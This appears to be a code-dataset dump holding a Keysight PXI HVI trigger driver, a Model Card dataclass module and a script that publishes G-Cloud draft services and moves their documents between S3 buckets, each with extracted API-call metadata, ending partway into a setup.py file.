[((17353, 17370), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (17364, 17370), False, 'from collections import defaultdict\n'), ((18399, 18415), 'sys.stdin.read', 'sys.stdin.read', ([], {}), '()\n', (18413, 18415), False, 'import argparse, glob, re, sys\n'), ((2963, 2979), 'collections.defaultdict', 'defaultdict', (['set'], {}), '(set)\n', (2974, 2979), False, 'from collections import defaultdict\n'), ((3390, 3412), 'pprint.pprint', 'pprint', (['self.key_names'], {}), '(self.key_names)\n', (3396, 3412), False, 'from pprint import pprint\n'), ((3446, 3464), 'pprint.pprint', 'pprint', (['self.names'], {}), '(self.names)\n', (3452, 3464), False, 'from pprint import pprint\n'), ((3927, 3951), 'pprint.pprint', 'pprint', (['self.named_types'], {}), '(self.named_types)\n', (3933, 3951), False, 'from pprint import pprint\n'), ((18442, 18463), 'asdl.lang.alive_lang.alive.parser.parse_opt_file', 'parse_opt_file', (['input'], {}), '(input)\n', (18456, 18463), False, 'from asdl.lang.alive_lang.alive.parser import parse_opt_file\n'), ((6763, 6796), 're.sub', 're.sub', (['"""[^a-zA-Z0-9_]"""', '""""""', 'hint'], {}), "('[^a-zA-Z0-9_]', '', hint)\n", (6769, 6796), False, 'import argparse, glob, re, sys\n'), ((6879, 6903), 're.sub', 're.sub', (['"""__+"""', '"""_"""', 'hint'], {}), "('__+', '_', hint)\n", (6885, 6903), False, 'import argparse, glob, re, sys\n'), ((6917, 6942), 're.sub', 're.sub', (['"""^_|_$"""', '""""""', 'hint'], {}), "('^_|_$', '', hint)\n", (6923, 6942), False, 'import argparse, glob, re, sys\n'), ((15979, 15987), 'itertools.count', 'count', (['(1)'], {}), '(1)\n', (15984, 15987), False, 'from itertools import combinations, count\n'), ((17389, 17397), 'itertools.count', 'count', (['(1)'], {}), '(1)\n', (17394, 17397), False, 'from itertools import combinations, count\n')]
|
#!/usr/bin/env python
import sys
import os
import numpy as np
from BaseDriver import LabberDriver, Error
sys.path.append('C:\\Program Files (x86)\\Keysight\\SD1\\Libraries\\Python')
import keysightSD1
class Driver(LabberDriver):
"""Keysigh PXI HVI trigger"""
def performOpen(self, options={}):
"""Perform the operation of opening the instrument connection"""
# timeout
self.timeout_ms = int(1000 * self.dComCfg['Timeout'])
# get PXI chassis
self.chassis = int(self.comCfg.address)
# auto-scan chassis address
n_unit = keysightSD1.SD_Module.moduleCount()
all_chassis = [
keysightSD1.SD_Module.getChassisByIndex(n) for n in range(n_unit)]
# check if user-given chassis is available
if n_unit > 0 and self.chassis not in all_chassis:
# if all units are in the same chassis, override given PXI chassis
if np.all(np.array(all_chassis) == all_chassis[0]):
self.chassis = all_chassis[0]
# number of slots in chassis
self.n_slot = 18
# supported AWGs and Digitizers
self.AWGS = ['M3201', 'M3202', 'M3300', 'M3302']
self.DIGS = ['M3100', 'M3102']
# keep track of current PXI configuration
# 0: None, 1: AWG, 2: Digitizer
self.units = [0] * self.n_slot
self.old_trig_period = -1.0
self.old_dig_delay = -1.0
# Create HVI object
self.HVI = keysightSD1.SD_HVI()
def performClose(self, bError=False, options={}):
"""Perform the close instrument connection operation"""
# do not check for error if close was called with an error
try:
# close instrument
self.HVI.stop()
self.HVI.close()
except Exception:
# never return error here
pass
def performSetValue(self, quant, value, sweepRate=0.0, options={}):
"""Perform the Set Value instrument operation. This function should
return the actual value set by the instrument"""
# continue depending on quantity
if quant.name == 'Auto-detect':
# auto-detect units
if value:
self.auto_detect()
elif quant.name == 'Scan':
# when scanning, just run auto-detect
self.auto_detect()
else:
# just set the quantity value, config will be set at final call
quant.setValue(value)
# only update configuration at final call
if self.isFinalCall(options):
self.configure_hvi()
return value
def configure_hvi(self):
"""Configure and start/stop HVI depending on UI settings"""
# get units
units = self.get_pxi_config_from_ui()
n_awg = len([x for x in units if x == 1])
n_dig = len([x for x in units if x == 2])
# if no units in use, just stop
if (n_awg + n_dig) == 0:
self.HVI.stop()
return
# check if unit configuration changed, if so reload HVI
if units != self.units:
# stop current HVI, may not even be running
self.HVI.stop()
self.HVI.close()
self.units = units
# we need at least one AWG
if n_awg == 0:
raise Error('This driver requires at least one AWG.')
# currently only support 2 digitizers
if n_dig > 2:
raise Error('This driver only supports up to two digitizers.')
# get HVI name and open
hvi_name = 'InternalTrigger_%d_%d.HVI' % (n_awg, n_dig)
dir_path = os.path.dirname(os.path.realpath(__file__))
self.HVI.open(os.path.join(dir_path, 'HVI_Delay', hvi_name))
# assign units, run twice to ignore errors before all units are set
for m in range(2):
awg_number = 0
dig_number = 0
for n, unit in enumerate(units):
# if unit in use, assign to module
if unit == 0:
continue
elif unit == 1:
# AWG
module_name = 'Module %d' % awg_number
awg_number += 1
elif unit == 2:
# digitizer
module_name = 'DAQ %d' % dig_number
dig_number += 1
r = self.HVI.assignHardwareWithUserNameAndSlot(
module_name, self.chassis, n + 1)
# only check for errors after second run
if m > 0:
self.check_keysight_error(r)
# clear old trig period to force update
self.old_trig_period = 0.0
# only update trig period if necessary, takes time to re-compile
if (self.getValue('Trig period') != self.old_trig_period or
self.getValue('Digitizer delay') != self.old_dig_delay):
self.old_trig_period = self.getValue('Trig period')
self.old_dig_delay = self.getValue('Digitizer delay')
# update trig period, include 460 ns delay in HVI
wait = round(self.getValue('Trig period') / 10E-9) - 46
digi_wait = round(self.getValue('Digitizer delay') / 10E-9)
# special case if only one module: add 240 ns extra delay
if (n_awg + n_dig) == 1:
wait += 24
# r = self.HVI.writeIntegerConstantWithIndex(0, 'Wait time', wait)
r = self.HVI.writeIntegerConstantWithUserName(
'Module 0', 'Wait time', wait)
self.check_keysight_error(r)
self.log('Number of modules', self.HVI.getNumberOfModules())
for n in range(n_dig):
r = self.HVI.writeIntegerConstantWithUserName(
'DAQ %d' % n, 'Digi wait', digi_wait)
self.check_keysight_error(r)
# need to recompile after setting wait time, not sure why
self.check_keysight_error(self.HVI.compile())
# try to load a few times, sometimes hangs on first try
n_try = 5
while True:
try:
self.check_keysight_error(self.HVI.load())
break
except Exception:
n_try -= 1
if n_try <= 0:
raise
# start or stop the HVI, depending on output state
if self.getValue('Output'):
self.check_keysight_error(self.HVI.start())
else:
self.HVI.stop()
def check_keysight_error(self, code):
"""Check and raise error"""
if code >= 0:
return
# get error message
raise Error(keysightSD1.SD_Error.getErrorMessage(code))
def auto_detect(self):
"""Auto-detect units"""
# start by clearing old config
for n in range(self.n_slot):
self.setValue('Slot %d' % (n + 1), 0)
# loop through all units, make sure chassis match
n_unit = keysightSD1.SD_Module.moduleCount()
for n in range(n_unit):
chassis = keysightSD1.SD_Module.getChassisByIndex(n)
slot = keysightSD1.SD_Module.getSlotByIndex(n)
# if chassis match, check unit type
if chassis == self.chassis:
model = keysightSD1.SD_Module.getProductNameByIndex(n)
if model[:5] in self.AWGS:
self.setValue('Slot %d' % slot, 'AWG')
elif model[:5] in self.DIGS:
self.setValue('Slot %d' % slot, 'Digitizer')
def get_pxi_config_from_ui(self):
"""Get PXI config from user interface"""
units = []
for n in range(self.n_slot):
units.append(self.getValueIndex('Slot %d' % (n + 1)))
return units
if __name__ == '__main__':
pass
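# --- Illustration (not part of the driver) ---
# A small sketch of the HVI wait-count arithmetic used in configure_hvi()
# above: the HVI sequencer runs on a 10 ns clock and the HVI adds 460 ns of
# fixed latency, so the programmed wait is period/10ns minus 46 counts, plus
# 240 ns extra when only a single module is present.
def hvi_wait_counts(trig_period_s, dig_delay_s, n_modules):
    """Hypothetical helper mirroring the timing math in configure_hvi()."""
    wait = round(trig_period_s / 10E-9) - 46
    digi_wait = round(dig_delay_s / 10E-9)
    if n_modules == 1:
        wait += 24
    return wait, digi_wait
# e.g. hvi_wait_counts(100e-6, 1e-6, 2) -> (9954, 100)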
|
[
"sys.path.append",
"BaseDriver.Error",
"keysightSD1.SD_Module.getProductNameByIndex",
"keysightSD1.SD_Module.getSlotByIndex",
"os.path.realpath",
"keysightSD1.SD_Module.moduleCount",
"keysightSD1.SD_HVI",
"keysightSD1.SD_Module.getChassisByIndex",
"numpy.array",
"os.path.join",
"keysightSD1.SD_Error.getErrorMessage"
] |
[((105, 181), 'sys.path.append', 'sys.path.append', (['"""C:\\\\Program Files (x86)\\\\Keysight\\\\SD1\\\\Libraries\\\\Python"""'], {}), "('C:\\\\Program Files (x86)\\\\Keysight\\\\SD1\\\\Libraries\\\\Python')\n", (120, 181), False, 'import sys\n'), ((585, 620), 'keysightSD1.SD_Module.moduleCount', 'keysightSD1.SD_Module.moduleCount', ([], {}), '()\n', (618, 620), False, 'import keysightSD1\n'), ((1469, 1489), 'keysightSD1.SD_HVI', 'keysightSD1.SD_HVI', ([], {}), '()\n', (1487, 1489), False, 'import keysightSD1\n'), ((7161, 7196), 'keysightSD1.SD_Module.moduleCount', 'keysightSD1.SD_Module.moduleCount', ([], {}), '()\n', (7194, 7196), False, 'import keysightSD1\n'), ((657, 699), 'keysightSD1.SD_Module.getChassisByIndex', 'keysightSD1.SD_Module.getChassisByIndex', (['n'], {}), '(n)\n', (696, 699), False, 'import keysightSD1\n'), ((6855, 6897), 'keysightSD1.SD_Error.getErrorMessage', 'keysightSD1.SD_Error.getErrorMessage', (['code'], {}), '(code)\n', (6891, 6897), False, 'import keysightSD1\n'), ((7251, 7293), 'keysightSD1.SD_Module.getChassisByIndex', 'keysightSD1.SD_Module.getChassisByIndex', (['n'], {}), '(n)\n', (7290, 7293), False, 'import keysightSD1\n'), ((7313, 7352), 'keysightSD1.SD_Module.getSlotByIndex', 'keysightSD1.SD_Module.getSlotByIndex', (['n'], {}), '(n)\n', (7349, 7352), False, 'import keysightSD1\n'), ((3333, 3380), 'BaseDriver.Error', 'Error', (['"""This driver requires at least one AWG."""'], {}), "('This driver requires at least one AWG.')\n", (3338, 3380), False, 'from BaseDriver import LabberDriver, Error\n'), ((3479, 3535), 'BaseDriver.Error', 'Error', (['"""This driver only supports up to two digitizers."""'], {}), "('This driver only supports up to two digitizers.')\n", (3484, 3535), False, 'from BaseDriver import LabberDriver, Error\n'), ((3680, 3706), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (3696, 3706), False, 'import os\n'), ((3734, 3779), 'os.path.join', 'os.path.join', (['dir_path', '"""HVI_Delay"""', 'hvi_name'], {}), "(dir_path, 'HVI_Delay', hvi_name)\n", (3746, 3779), False, 'import os\n'), ((7465, 7511), 'keysightSD1.SD_Module.getProductNameByIndex', 'keysightSD1.SD_Module.getProductNameByIndex', (['n'], {}), '(n)\n', (7508, 7511), False, 'import keysightSD1\n'), ((935, 956), 'numpy.array', 'np.array', (['all_chassis'], {}), '(all_chassis)\n', (943, 956), True, 'import numpy as np\n')]
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Model Card Data Class.
The Model Card (MC) is the document designed for transparent reporting of AI
model provenance, usage, and ethics-informed evaluation. The model card can be
presented by different formats (e.g. HTML, PDF, Markdown). The properties of
the Model Card (MC) are defined by a json schema. The ModelCard class in the
ModelCardsToolkit serves as an API to read and write MC properties by the users.
"""
import json
from typing import Any, Dict, List, Optional, Text, Union
import dataclasses
@dataclasses.dataclass
class Version:
"""The information about verions of a model."""
# The name of the version.
name: Optional[Text] = None
# The date the version was released.
date: Optional[Text] = None
# The changes from the previous version.
diff: Optional[Text] = None
@dataclasses.dataclass
class Owner:
"""The information about owners of a model."""
# The name of the owner.
name: Optional[Text] = None
# The contact information of the owner.
contact: Optional[Text] = None
@dataclasses.dataclass
class ModelDetails:
"""Metadata about the model."""
# The name of the model.
name: Optional[Text] = None
# A description of the model card.
overview: Optional[Text] = None
# The individuals or teams who own the model.
owners: List[Owner] = dataclasses.field(default_factory=list)
# The version of the model.
version: Version = dataclasses.field(default_factory=Version)
# The model's license for use.
license: Optional[Text] = None
# Links providing more information about the model.
references: List[Text] = dataclasses.field(default_factory=list)
# How to reference this model card.
citation: Optional[Text] = None
@dataclasses.dataclass
class Graphic:
"""A named inline plot."""
# The name of the graphic.
name: Text
  # The image, encoded as a base64 string.
image: Text
@dataclasses.dataclass
class Graphics:
"""A collection of graphics."""
# A description of this collection of graphics.
description: Optional[Text] = None
# A collection of graphics.
collection: List[Graphic] = dataclasses.field(default_factory=list)
@dataclasses.dataclass
class Dataset:
"""The information about a dataset used to generate a model."""
# The name of the dataset.
name: Optional[Text] = None
  # The link to the dataset.
link: Optional[Text] = None
# Does this dataset contain human or other sensitive data?
sensitive: Optional[bool] = None
# Visualizations of the dataset.
graphics: Graphics = dataclasses.field(default_factory=Graphics)
@dataclasses.dataclass
class Data:
"""The related datasets used to train and evaluate the model."""
# The training dataset
train: Dataset = dataclasses.field(default_factory=Dataset)
# The evaluation dataset
eval: Dataset = dataclasses.field(default_factory=Dataset)
@dataclasses.dataclass
class ModelParameters:
"""Parameters for construction of the model."""
# The architecture of the model.
model_architecture: Optional[Text] = None
# The datasets used to train and evaluate the model.
data: Data = dataclasses.field(default_factory=Data)
# The data format for inputs to the model.
input_format: Optional[Text] = None
# The data format for outputs from the model.
output_format: Optional[Text] = None
@dataclasses.dataclass
class ConfidenceInterval:
"""The confidence interval of the metric."""
# The lower bound of the confidence interval.
lower_bound: float
# The upper bound of the confidence interval.
upper_bound: float
@dataclasses.dataclass
class PerformanceMetric:
"""The details of the performance metric."""
# The type of performance metric.
type: Text
# The value of the performance metric.
value: Union[int, float, Text]
# The confidence interval of the metric.
confidence_interval: Optional[ConfidenceInterval] = None
# The decision threshold the metric was computed on.
threshold: Optional[float] = None
# The name of the slice this metric was computed on.
slice: Optional[Text] = None
@dataclasses.dataclass
class QuantitativeAnalysis:
"""The quantitative analysis of a model."""
# The model performance metrics being reported.
performance_metrics: List[PerformanceMetric] = dataclasses.field(
default_factory=list)
# Visualizations of model performance.
graphics: Graphics = dataclasses.field(default_factory=Graphics)
@dataclasses.dataclass
class Risk:
"""The information about risks when using the model."""
# The name of the risk.
name: Text
# Strategy used to address this risk.
mitigation_strategy: Text
@dataclasses.dataclass
class Considerations:
"""Considerations related to model construction, training, and application."""
# Who are the intended users of the model?
users: List[Text] = dataclasses.field(default_factory=list)
    # What are the intended use cases of the model?
    use_cases: List[Text] = dataclasses.field(default_factory=list)
    # What are the known technical limitations of the model?
    limitations: List[Text] = dataclasses.field(default_factory=list)
    # What are the known tradeoffs in accuracy/performance of the model?
    tradeoffs: List[Text] = dataclasses.field(default_factory=list)
    # What are the ethical risks involved in the application of this model?
    ethical_considerations: List[Risk] = dataclasses.field(default_factory=list)
@dataclasses.dataclass
class ModelCard:
"""Fields used to generate the Model Card."""
    # The JSON schema version of the ModelCard.
schema_version: Optional[Text] = None
# Descriptive metadata for the model.
    model_details: ModelDetails = dataclasses.field(default_factory=ModelDetails)
# Parameters used when generating the model.
model_parameters: ModelParameters = dataclasses.field(
default_factory=ModelParameters)
    # The quantitative analysis of the model.
quantitative_analysis: QuantitativeAnalysis = dataclasses.field(
default_factory=QuantitativeAnalysis)
# The considerations related to model construction, training, and application.
considerations: Considerations = dataclasses.field(
default_factory=Considerations)
def to_dict(self) -> Dict[Text, Any]:
        # Recursively drop empty/None properties so missing values are omitted.
ignore_none = lambda properties: {k: v for k, v in properties if v}
return dataclasses.asdict(self, dict_factory=ignore_none)
def to_json(self) -> Text:
return json.dumps(self.to_dict(), indent=2)
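

# --- Usage sketch (not part of the original module; all field values below are
# illustrative assumptions): build a minimal card and serialize it.
if __name__ == "__main__":
    card = ModelCard(schema_version="0.0.1")
    card.model_details.name = "example-model"
    card.model_details.owners.append(Owner(name="jane", contact="jane@example.com"))
    card.quantitative_analysis.performance_metrics.append(
        PerformanceMetric(type="accuracy", value=0.9))
    # Empty/None fields are dropped by to_dict(), so the JSON stays compact.
    print(card.to_json())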
|
[
"dataclasses.field",
"dataclasses.asdict"
] |
[((1877, 1916), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (1894, 1916), False, 'import dataclasses\n'), ((1968, 2010), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'Version'}), '(default_factory=Version)\n', (1985, 2010), False, 'import dataclasses\n'), ((2158, 2197), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (2175, 2197), False, 'import dataclasses\n'), ((2666, 2705), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (2683, 2705), False, 'import dataclasses\n'), ((3096, 3139), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'Graphics'}), '(default_factory=Graphics)\n', (3113, 3139), False, 'import dataclasses\n'), ((3288, 3330), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'Dataset'}), '(default_factory=Dataset)\n', (3305, 3330), False, 'import dataclasses\n'), ((3376, 3418), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'Dataset'}), '(default_factory=Dataset)\n', (3393, 3418), False, 'import dataclasses\n'), ((3666, 3705), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'Data'}), '(default_factory=Data)\n', (3683, 3705), False, 'import dataclasses\n'), ((4809, 4848), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (4826, 4848), False, 'import dataclasses\n'), ((4920, 4963), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'Graphics'}), '(default_factory=Graphics)\n', (4937, 4963), False, 'import dataclasses\n'), ((5361, 5400), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (5378, 5400), False, 'import dataclasses\n'), ((5477, 5516), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (5494, 5516), False, 'import dataclasses\n'), ((5604, 5643), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (5621, 5643), False, 'import dataclasses\n'), ((5740, 5779), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (5757, 5779), False, 'import dataclasses\n'), ((5893, 5932), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (5910, 5932), False, 'import dataclasses\n'), ((6307, 6357), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'ModelParameters'}), '(default_factory=ModelParameters)\n', (6324, 6357), False, 'import dataclasses\n'), ((6460, 6515), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'QuantitativeAnalysis'}), '(default_factory=QuantitativeAnalysis)\n', (6477, 6515), False, 'import dataclasses\n'), ((6639, 6688), 'dataclasses.field', 'dataclasses.field', ([], {'default_factory': 'Considerations'}), '(default_factory=Considerations)\n', (6656, 6688), False, 'import dataclasses\n'), ((6885, 6935), 'dataclasses.asdict', 'dataclasses.asdict', (['self'], {'dict_factory': 'ignore_none'}), '(self, dict_factory=ignore_none)\n', (6903, 6935), False, 'import dataclasses\n')]
|
#!/usr/bin/env python3
"""
PREREQUISITE: For document migration to work you'll need AWS credentials set up for the relevant environment:
Save your aws_access_key_id and aws_secret_access_key in ~/.aws/credentials
If you have more than one set of credentials in there then be sure to set your AWS_PROFILE environment
variable to reference the right credentials before running the script.
THIS SCRIPT NEEDS TO BE RUN BY AN AWS IAM ENTITY FROM THE SAME ACCOUNT AS THE DOCUMENTS BUCKET BEING
UPLOADED TO. THIS IS SO THE S3 OBJECT OWNER IS THAT ACCOUNT AND NOT A DIFFERENT ACCOUNT. OTHERWISE THERE
WILL BE PERMISSION ISSUES IF A SUPPLIER UPDATES THEIR DOCUMENTS. CHANGING OBJECT OWNERS ONCE UPLOADED
IS NOT IMPOSSIBLE BUT IT IS A RIGHT FAFF. CURRENTLY THERE IS NOT AN EASY WAY TO DO THIS FROM JENKINS. A
PROCESS COULD BE SET UP TO ALLOW JENKINS TO ASSUME A DIFFERENT ROLE.
For a G-Cloud style framework (with uploaded documents to migrate) this will:
1. Find all suppliers awarded onto the framework
2. Find all their submitted draft services on the framework
3. Migrate these from drafts to "real" services, which includes moving documents to the live documents bucket
and updating document URLs in the migrated version of the services
Usage:
scripts/publish-g-cloud-draft-services.py <framework_slug> <stage> <draft_bucket>
<documents_bucket> [--dry-run] [--draft-ids=<filename>]
If you specify the `--draft-ids` parameter, pass in a file of newline-separated draft ids. This script will then do a
full re-publish of just those drafts (i.e. try to re-publish each one, then copy the documents across again and update
those links).
"""
import backoff
import collections
from datetime import datetime
from docopt import docopt
import random
import re
import sys
sys.path.insert(0, '.')
import dmapiclient
from dmscripts.helpers.auth_helpers import get_auth_token
from dmscripts.helpers.framework_helpers import find_suppliers_on_framework, get_submitted_drafts
from dmapiclient import DataAPIClient
from dmutils.s3 import S3, S3ResponseError
from dmutils.env_helpers import get_api_endpoint_from_stage, get_assets_endpoint_from_stage
DOCUMENT_KEYS = [
'pricingDocumentURL', 'serviceDefinitionDocumentURL',
'sfiaRateDocumentURL', 'termsAndConditionsDocumentURL',
]
def assert_equal(one, two):
assert one == two, "{} != {}".format(one, two)
def parse_document_url(url, framework_slug):
pattern = r'/{}/submissions/(\d+)/(\d+)-(.*)$'.format(re.escape(framework_slug))
match = re.search(pattern, url)
if not match:
raise ValueError("Could not parse document URL {}".format(url))
return {
'supplier_id': match.group(1),
'draft_id': match.group(2),
'document_name': match.group(3),
}
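# Worked example for parse_document_url (illustrative values): with
# framework_slug "g-cloud-9",
#   parse_document_url("https://assets.example.com/g-cloud-9/submissions/1234/5678-pricing.pdf", "g-cloud-9")
# returns {'supplier_id': '1234', 'draft_id': '5678', 'document_name': 'pricing.pdf'}.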
def get_draft_document_path(parsed_document, framework_slug):
return '{framework_slug}/submissions/{supplier_id}/{draft_id}-{document_name}'.format(
framework_slug=framework_slug,
**parsed_document)
def get_live_document_path(parsed_document, framework_slug, service_id):
return '{framework_slug}/documents/{supplier_id}/{service_id}-{document_name}'.format(
framework_slug=framework_slug,
service_id=service_id,
**parsed_document)
def get_live_asset_url(live_document_path):
return "{}/{}".format(get_assets_endpoint_from_stage(STAGE), live_document_path)
def document_copier(draft_bucket, documents_bucket, dry_run):
def copy_document(draft_document_path, live_document_path):
if not draft_bucket.path_exists(draft_document_path):
raise ValueError("Draft document {} does not exist in bucket {}".format(
draft_document_path, draft_bucket.bucket_name))
message_suffix = "{}:{} to {}:{}".format(
draft_bucket.bucket_name, draft_document_path,
documents_bucket.bucket_name, live_document_path)
if dry_run:
print(" > dry run: skipped copying {}".format(message_suffix))
else:
documents_bucket.copy(src_bucket=draft_bucket.bucket_name, src_key=draft_document_path,
target_key=live_document_path, acl='public-read')
print(" > copied {}".format(message_suffix))
return copy_document
@backoff.on_exception(backoff.expo, S3ResponseError, max_tries=5)
def copy_draft_documents(client, copy_document, draft_service, framework_slug, dry_run, service_id):
document_updates = {}
for document_key in DOCUMENT_KEYS:
if document_key in draft_service:
parsed_document = parse_document_url(draft_service[document_key], framework_slug)
assert_equal(str(parsed_document['supplier_id']), str(draft_service['supplierId']))
assert_equal(str(parsed_document['draft_id']), str(draft_service['id']))
draft_document_path = get_draft_document_path(parsed_document, framework_slug)
live_document_path = get_live_document_path(parsed_document, framework_slug, service_id)
try:
copy_document(draft_document_path, live_document_path)
except ValueError as e:
if not str(e).startswith('Target key already exists in S3'):
raise e
document_updates[document_key] = get_live_asset_url(live_document_path)
if dry_run:
print(" > dry run: skipped updating document URLs {}".format(document_updates))
else:
client.update_service(service_id, document_updates, 'Moving documents to live bucket')
print(" > document URLs updated")
def make_draft_service_live(client, copy_document, draft_service, framework_slug, dry_run,
continue_if_published=False):
print(" > Migrating draft {}".format(draft_service['id']))
if dry_run:
service_id = random.randint(1000, 10000)
print(" > dry run: generating random test service ID: {}".format(service_id))
else:
try:
services = client.publish_draft_service(draft_service['id'], 'publish g-cloud draft services script')
service_id = services['services']['id']
print(" > draft service published - new service ID {}".format(service_id))
except dmapiclient.HTTPError as e:
if continue_if_published and e.status_code == 400 \
and str(e).startswith('Cannot re-publish a submitted service'):
published_draft = client.get_draft_service(draft_service['id'])
services = client.get_service(published_draft['services']['serviceId'])
service_id = services['services']['id']
else:
raise e
copy_draft_documents(client, copy_document, draft_service, framework_slug, dry_run, service_id)
if __name__ == '__main__':
arguments = docopt(__doc__)
STAGE = arguments['<stage>']
api_url = get_api_endpoint_from_stage(STAGE)
client = DataAPIClient(api_url, get_auth_token('api', STAGE))
DRAFT_BUCKET = S3(arguments['<draft_bucket>'])
DOCUMENTS_BUCKET = S3(arguments['<documents_bucket>'])
DRY_RUN = arguments['--dry-run']
FRAMEWORK_SLUG = arguments['<framework_slug>']
DRAFT_IDS = arguments['--draft-ids']
copy_document = document_copier(DRAFT_BUCKET, DOCUMENTS_BUCKET, DRY_RUN)
results = collections.Counter({'success': 0, 'fail': 0})
def get_draft_services():
if DRAFT_IDS:
with open(DRAFT_IDS) as draft_ids:
draft_ids = [line.strip() for line in draft_ids.read().split()]
for draft_id in draft_ids:
draft_service = client.get_draft_service(draft_id)['services']
supplier_framework = client.get_supplier_framework_info(draft_service['supplierId'], FRAMEWORK_SLUG)
if supplier_framework['onFramework']:
yield draft_service
else:
suppliers = find_suppliers_on_framework(client, FRAMEWORK_SLUG)
for supplier in suppliers:
print("Migrating drafts for supplier {}".format(supplier['supplierId']))
for draft in get_submitted_drafts(client, FRAMEWORK_SLUG, supplier['supplierId']):
yield draft
for draft_service in get_draft_services():
try:
make_draft_service_live(client, copy_document, draft_service, FRAMEWORK_SLUG, DRY_RUN,
continue_if_published=True if DRAFT_IDS else False)
results.update({'success': 1})
except Exception as e:
print("{} ERROR MIGRATING DRAFT {} TO LIVE: {}".format(datetime.now(), draft_service['id'], e))
results.update({'fail': 1})
print("Successfully published {} G-Cloud services".format(results.get('success')))
if results.get('fail'):
print("Failed to publish {} services because of errors".format(results.get('fail')))
exit(results.get('fail'))
|
[
"random.randint",
"docopt.docopt",
"dmscripts.helpers.auth_helpers.get_auth_token",
"sys.path.insert",
"dmutils.env_helpers.get_api_endpoint_from_stage",
"backoff.on_exception",
"re.escape",
"datetime.datetime.now",
"dmscripts.helpers.framework_helpers.find_suppliers_on_framework",
"collections.Counter",
"re.search",
"dmutils.env_helpers.get_assets_endpoint_from_stage",
"dmutils.s3.S3",
"dmscripts.helpers.framework_helpers.get_submitted_drafts"
] |
[((1887, 1910), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""."""'], {}), "(0, '.')\n", (1902, 1910), False, 'import sys\n'), ((4385, 4449), 'backoff.on_exception', 'backoff.on_exception', (['backoff.expo', 'S3ResponseError'], {'max_tries': '(5)'}), '(backoff.expo, S3ResponseError, max_tries=5)\n', (4405, 4449), False, 'import backoff\n'), ((2624, 2647), 're.search', 're.search', (['pattern', 'url'], {}), '(pattern, url)\n', (2633, 2647), False, 'import re\n'), ((6952, 6967), 'docopt.docopt', 'docopt', (['__doc__'], {}), '(__doc__)\n', (6958, 6967), False, 'from docopt import docopt\n'), ((7016, 7050), 'dmutils.env_helpers.get_api_endpoint_from_stage', 'get_api_endpoint_from_stage', (['STAGE'], {}), '(STAGE)\n', (7043, 7050), False, 'from dmutils.env_helpers import get_api_endpoint_from_stage, get_assets_endpoint_from_stage\n'), ((7137, 7168), 'dmutils.s3.S3', 'S3', (["arguments['<draft_bucket>']"], {}), "(arguments['<draft_bucket>'])\n", (7139, 7168), False, 'from dmutils.s3 import S3, S3ResponseError\n'), ((7192, 7227), 'dmutils.s3.S3', 'S3', (["arguments['<documents_bucket>']"], {}), "(arguments['<documents_bucket>'])\n", (7194, 7227), False, 'from dmutils.s3 import S3, S3ResponseError\n'), ((7450, 7496), 'collections.Counter', 'collections.Counter', (["{'success': 0, 'fail': 0}"], {}), "({'success': 0, 'fail': 0})\n", (7469, 7496), False, 'import collections\n'), ((2585, 2610), 're.escape', 're.escape', (['framework_slug'], {}), '(framework_slug)\n', (2594, 2610), False, 'import re\n'), ((3429, 3466), 'dmutils.env_helpers.get_assets_endpoint_from_stage', 'get_assets_endpoint_from_stage', (['STAGE'], {}), '(STAGE)\n', (3459, 3466), False, 'from dmutils.env_helpers import get_api_endpoint_from_stage, get_assets_endpoint_from_stage\n'), ((5952, 5979), 'random.randint', 'random.randint', (['(1000)', '(10000)'], {}), '(1000, 10000)\n', (5966, 5979), False, 'import random\n'), ((7088, 7116), 'dmscripts.helpers.auth_helpers.get_auth_token', 'get_auth_token', (['"""api"""', 'STAGE'], {}), "('api', STAGE)\n", (7102, 7116), False, 'from dmscripts.helpers.auth_helpers import get_auth_token\n'), ((8046, 8097), 'dmscripts.helpers.framework_helpers.find_suppliers_on_framework', 'find_suppliers_on_framework', (['client', 'FRAMEWORK_SLUG'], {}), '(client, FRAMEWORK_SLUG)\n', (8073, 8097), False, 'from dmscripts.helpers.framework_helpers import find_suppliers_on_framework, get_submitted_drafts\n'), ((8255, 8323), 'dmscripts.helpers.framework_helpers.get_submitted_drafts', 'get_submitted_drafts', (['client', 'FRAMEWORK_SLUG', "supplier['supplierId']"], {}), "(client, FRAMEWORK_SLUG, supplier['supplierId'])\n", (8275, 8323), False, 'from dmscripts.helpers.framework_helpers import find_suppliers_on_framework, get_submitted_drafts\n'), ((8746, 8760), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (8758, 8760), False, 'from datetime import datetime\n')]
|
"""package setup"""
import sys
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
"""Our test runner."""
